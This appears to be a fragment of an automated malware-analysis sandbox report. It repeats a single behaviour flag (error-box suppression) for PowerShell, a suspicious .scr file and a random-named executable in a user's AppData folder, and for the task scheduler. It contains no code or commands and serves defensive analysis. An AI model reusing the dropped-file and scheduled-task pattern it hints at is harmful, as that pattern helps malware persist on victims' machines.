                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
